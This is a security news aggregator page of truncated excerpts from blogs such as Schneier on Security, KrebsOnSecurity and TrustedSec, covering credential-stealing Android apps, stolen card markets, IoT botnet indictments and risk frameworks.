BuzzSec

from SANS Institute | Newsletters - Newsbites - RSS https://www.sans.org/newsletters/newsbites/xxii/52

A challenge many organizations face is understanding if and how they would recover from a disaster or malware event that takes down the production IT infrastructure or datacenter. In today’s workplace, nearly every organization is heavily reliant on IT and may not be able to conduct business without it. Here are some guidelines to help plan, prepare, and test for the unforeseen disaster. from SBS CyberSecurity https://sbscyber.com/resources/how-to-mature-your-disaster-recovery-testing-plan

Google has removed 25 Android apps from its store because they steal Facebook credentials : Before being taken down, the 25 apps were collectively downloaded more than 2.34 million times. The malicious apps were developed by the same threat group and despite offering different features, under the hood, all the apps worked the same. According to a report from French cyber-security firm Evina shared with ZDNet today, the apps posed as step counters, image editors, video editors, wallpaper apps, flashlight applications, file managers, and mobile games. The apps offered a legitimate functionality, but they also contained malicious code. Evina researchers say the apps contained code that detected what app a user recently opened and had in the phone's foreground. from Schneier on Security https://www.schneier.com/blog/archives/2020/06/android_apps_st.html

The COVID-19 pandemic has made it harder for banks to trace the source of payment card data stolen from smaller, hacked online merchants. On the plus side, months of quarantine have massively decreased demand for account information that thieves buy and use to create physical counterfeit credit cards. But fraud experts say recent developments suggest both trends are about to change — and likely for the worse. The economic laws of supply and demand hold just as true in the business world as they do in the cybercrime space. Global lockdowns from COVID-19 have resulted in far fewer fraudsters willing or able to visit retail stores to use their counterfeit cards, and the decreased demand has severely depressed prices in the underground for purloined card data. An ad for a site selling stolen payment card data, circa March 2020. That’s according to Gemini Advisory , a New York-based cyber intelligence firm that closely tracks the inventories of dark web stores trafficking in stolen pay

Governments at the federal, state, and local levels are all stretching their IT infrastructure capabilities in order to enable citizens to securely interact online with agency staff members who are working from home. However, these same government agencies are also facing a surge in cybercriminal activity. Threat actors are working overtime to exploit stay-at-home mandates — taking advantage of citizens and government personnel who don’t have strong security measures in place on their home networks. As reported in the New York Times , cybercriminals have used Social Security numbers, home addresses, and other personal information in recent weeks to assume people’s identities and bilk them out of their federal stimulus checks and state unemployment benefits. Local government programs that offer online financial support are likely to come under similar attacks. Even before the stay-at-home mandates were issued, agencies were already a top target for cyberattackers. That’s because gover

from SANS Institute | Newsletters - Newsbites - RSS https://www.sans.org/newsletters/newsbites/xxii/51

iOS apps are repeatedly reading clipboard data , which can include all sorts of sensitive information. While Haj Bakry and Mysk published their research in March, the invasive apps made headlines again this week with the developer beta release of iOS 14 . A novel feature Apple added provides a banner warning every time an app reads clipboard contents. As large numbers of people began testing the beta release, they quickly came to appreciate just how many apps engage in the practice and just how often they do it. This YouTube video , which has racked up more than 87,000 views since it was posted on Tuesday, shows a small sample of the apps triggering the new warning. from Schneier on Security https://www.schneier.com/blog/archives/2020/06/iphone_apps_ste.html

Are you having trouble remediating your penetration test findings? It might be time to get some help from TrustedSec. After TrustedSec consultants complete security assessments, clients will often ask us to re-test the specific findings from the last test. But in many instances, those same problems exist—sometimes they are exactly the same, but other times, they manifest as different symptoms of the same challenge. Here are a few quick tips to avoid testing the same vulnerabilities over and over. Ask Questions…It’s Free! At TrustedSec, we are always willing to hop on a phone call, answer any questions, or offer advice. Security has gotten very complicated and no one person knows everything about security and compliance—it’s simply too much. Thus, it can be tremendously helpful to run an idea or issue past someone who has been there or helped others with the same situation. Sometimes a little nugget of information can really save you. Look at ‘Blue Team’ or Program Improvement Servi

So much information about testing webapps for security problems is old. Don’t get me wrong, the old stuff still works way more often than we’d like, but there’s more to webapp vulnerabilities than cross-site scripting and SQL injection. Take JWTs – JSON Web Tokens – for example. These are base64 encoded tokens that sometimes get […] The post Webcast: Modern Webapp Pentesting: How to Attack a JWT appeared first on Black Hills Information Security . from Black Hills Information Security https://www.blackhillsinfosec.com/webcast-modern-webapp-pentesting-how-to-attack-a-jwt/

A well-connected Russian hacker once described as “an asset of supreme importance” to Moscow was sentenced on Friday to nine years in a U.S. prison after pleading guilty to running a site that sold stolen payment card data, and to administering a highly secretive crime forum that counted among its members some of the most elite Russian cybercrooks. Alexei Burkov, seated second from right, attends a hearing in Jerusalem in 2015. Photo: Andrei Shirokov / Tass via Getty Images. Alexsei Burkov of St. Petersburg, Russia admitted to running CardPlanet , a site that sold more than 150,000 stolen credit card accounts, and to being a founder of DirectConnection — a closely guarded underground community that attracted some of the world’s most-wanted Russian hackers. As KrebsOnSecurity noted in  a November 2019 profile of Burkov’s hacker nickname ‘k0pa,’  “a deep dive into the various pseudonyms allegedly used by Burkov suggests this individual may be one of the most connected and skilled

Interesting article on the rise of the jumbo squid industry as a result of climate change. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here . from Schneier on Security https://www.schneier.com/blog/archives/2020/06/friday_squid_bl_735.html

Sept 15-16 (Iowa): This course will focus specifically on each element of the FFIEC Cybersecurity Assessment Tool. In addition, we will complete detailed lab exercises that demonstrate how each process works. from SBS CyberSecurity https://sbscyber.com/resources/articleType/ArticleView/articleId/3735/onsite-iba-certified-banking-cybersecurity-manager

Interesting research: " Identifying Unintended Harms of Cybersecurity Countermeasures ": Abstract: Well-meaning cybersecurity risk owners will deploy countermeasures (technologies or procedures) to manage risks to their services or systems. In some cases, those countermeasures will produce unintended consequences, which must then be addressed. Unintended consequences can potentially induce harm, adversely affecting user behaviour, user inclusion, or the infrastructure itself (including other services or countermeasures). Here we propose a framework for preemptively identifying unintended harms of risk countermeasures in cybersecurity.The framework identifies a series of unintended harms which go beyond technology alone, to consider the cyberphysical and sociotechnical space: displacement, insecure norms, additional costs, misuse, misclassification, amplification, and disruption. We demonstrate our framework through application to the complex,multi-stakeholder challenges as

The U.S. Justice Department today criminally charged a Canadian and a Northern Ireland man for allegedly conspiring to build botnets that enslaved hundreds of thousands of routers and other Internet of Things (IoT) devices for use in large-scale distributed denial-of-service (DDoS) attacks. In addition, a defendant in the United States was sentenced today to drug treatment and 18 months community confinement for his admitted role in the botnet conspiracy. Indictments unsealed by a federal court in Alaska today allege 20-year-old Aaron Sterritt from Larne, Northern Ireland, and 31-year-old Logan Shwydiuk of Saskatoon, Canada conspired to build, operate and improve their IoT crime machines over several years. Prosecutors say Sterritt, using the hacker aliases “ Vamp ” and “ Viktor ,” was the brains behind the computer code that powered several potent and increasingly complex IoT botnet strains that became known by exotic names such as “ Masuta ,” “ Satori ,” “ Okiru ” and “ Fbot .”

This blog post highlights some good techniques to use when restricted to testing an up-to-date Windows system with low-level user privileges (no local admin) through a Remote Desktop Protocol (RDP) connection. The Situation: At the start of this engagement, I faced the common task of needing to escalate privileges after acquiring low-level access to a Windows system. However, this is an organization that took steps to diversify their system configuration, hardened the OS, applied security patches, hardened group policies, etc. After some general information gathering, it seemed the system was not vulnerable to common privilege escalation techniques that I was aware of. While some good approaches to this situation might be to proxy through an RDP connection with tools like proxychains ( https://0x00sec.org/t/a-brief-introduction-to-proxychains/418 ) or something fancier like SocksOverRDP ( https://github.com/nccgroup/SocksOverRDP ), another option when trying to avoid using PowerShe

Editor’s Note : Over the next several weeks, we’re sharing excerpts from the second edition of our popular book, “ The Threat Intelligence Handbook: Moving Toward a Security Intelligence Program .” Here, we’re looking at chapter seven, “Threat Intelligence for Risk Analysis.” To read the entire chapter, download your free copy of the handbook . The National Institute of Standards and Technology (NIST) defines risk as a “measure of the extent to which an entity is threatened by a potential circumstance or event, and typically a function of: the adverse impacts that would arise if the circumstance or event occurs; and the likelihood of occurrence.” Seems pretty straightforward, except … Actually measuring risk is anything but. Think about it. Have you ever wanted to change career paths, make a big investment, move to a new city, or skydive out of a plane? Making the right decision requires thoughtful consideration — an understanding of potential benefits and consequences, and how to e

New research: " Best Practices for IoT Security: What Does That Even Mean? " by Christopher Bellman and Paul C. van Oorschot: Abstract: Best practices for Internet of Things (IoT) security have recently attracted considerable attention worldwide from industry and governments, while academic research has highlighted the failure of many IoT product manufacturers to follow accepted practices. We explore not the failure to follow best practices, but rather a surprising lack of understanding, and void in the literature, on what (generically) "best practice" means, independent of meaningfully identifying specific individual practices. Confusion is evident from guidelines that conflate desired outcomes with security practices to achieve those outcomes. How do best practices, good practices, and standard practices differ? Or guidelines, recommendations, and requirements? Can something be a best practice if it is not actionable? We consider categories of best practices, a

I fly a lot. Over the past five years, my average speed has been 32 miles an hour. That all changed mid-March. It's been 105 days since I've been on an airplane -- longer than any other time in my adult life -- and I have no future flights scheduled. This is all a prelude to saying that I have been paying a lot of attention to the COVID-related risks of flying. We know a lot more about how COVID-19 spreads than we did in March. The "less than six feet, more than ten minutes" model has given way to a much more sophisticated model involving airflow, the level of virus in the room, and the viral load in the person who might be infected. Regarding airplanes specifically: on the whole, they seem safer than many other group activities. Of all the research about contract tracing results I have read, I have seen no stories of a sick person on an airplane infecting other passengers. There are no superspreader events involving airplanes. (That did happen with SARS.) It s

Joff Thyer has dove into everything that is IPv6 and has so much to share about it. He gets really technical but in a way you’ll be able to understand. Google reports that over 30% of their systems access comes via the IPv6 protocol coming into 2020. Many Internet Service Providers have no remaining choice […] The post Webcast: IPv6: How to Securely Start Deploying appeared first on Black Hills Information Security . from Black Hills Information Security https://www.blackhillsinfosec.com/webcast-ipv6-how-to-securely-start-deploying/

Splunk Phantom enables security professionals to work smarter, respond faster, and strengthen their defenses through automation and orchestration. Phantom playbooks allow clients to create and automate customized, repeatable security workflows. Recorded Future supercharges those playbooks by inserting elite security intelligence directly into the Splunk platform — giving users the context they need to make informed security decisions fast. Recorded Future’s VP of Integrations, Seth Whitten, visited Splunk’s offices to talk about the history of the partnership between Recorded Future and Splunk Phantom . Whitten also discussed one of his favorite things about Phantom — playbooks. How Clients Benefit From Recorded Future’s Partnership with Splunk Phantom The benefit of partnering with Splunk Phantom was clear from the start. Recorded Future’s clients were manually conducting security operations and there was a desire to add automation to those operations . “They would have

Really interesting research: " An examination of the cryptocurrency pump and dump ecosystem ": Abstract : The surge of interest in cryptocurrencies has been accompanied by a proliferation of fraud. This paper examines pump and dump schemes. The recent explosion of nearly 2,000 cryptocurrencies in an unregulated environment has expanded the scope for abuse. We quantify the scope of cryptocurrency pump and dump schemes on Discord and Telegram, two popular group-messaging platforms. We joined all relevant Telegram and Discord groups/channels and identified thousands of different pumps. Our findings provide the first measure of the scope of such pumps and empirically document important properties of this ecosystem. from Schneier on Security https://www.schneier.com/blog/archives/2020/06/cryptocurrency_.html

from SANS Institute | Newsletters - Newsbites - RSS https://www.sans.org/newsletters/newsbites/xxii/50

A lot of effort goes into building out a BIA that meets regulation, you might as well make sure you are using that information to benefit your overall Business Continuity Plan, help you mitigate additional risk to your organization, and make better business decisions. from SBS CyberSecurity https://sbscyber.com/resources/articleType/ArticleView/articleId/3734/how-to-gain-additional-value-from-your-bia

An organization’s overall security posture can be viewed from multiple different angles, such as technical assessments, program assessments, controls assessments, and risk assessments. A number of different frameworks for each of these assessment types exist, intended to help both technical teams as well as leadership organize security program building activities. Some of these include: Penetration Testing Execution Standard (PTES) NIST Cyber Security Framework (CSF) Center for Internet Security (CIS) Critical Security Controls (CSC) Factor Analysis of Information Risk (FAIR) What most of these frameworks are missing is a gauge on how well the existing security inventory stack is performing, based on factors like how a tool has been deployed, how quickly a new rule can be pushed into production, the knowledge and experience of the team managing a tool, or even the maturity of a Security Information and Event Management (SIEM) team’s rule correlation capabilities. This concept of

Healthcare providers are under tremendous pressure to adhere to a plethora of privacy-related regulations. But now they have to do so while also experiencing unprecedented levels of cyberattacks. Neither of these points should come as a surprise given the value of the data at risk and the diversity of end-users and compute devices in the healthcare industry — not to mention, the IT environments in which medical devices operate. While new technologies help organizations improve patient care , they also give IT teams a lot of ground to cover when trying to protect patient information and the digital assets of their organizations. Adherence to regulations may help in some cases, but this may also distract from the real task at hand: Improving security posture (versus demonstrating compliance). In this blog, we examine why cybercriminals target the healthcare industry and how organizations can take on the challenge by leveraging the six principles of security intelligence. By applying se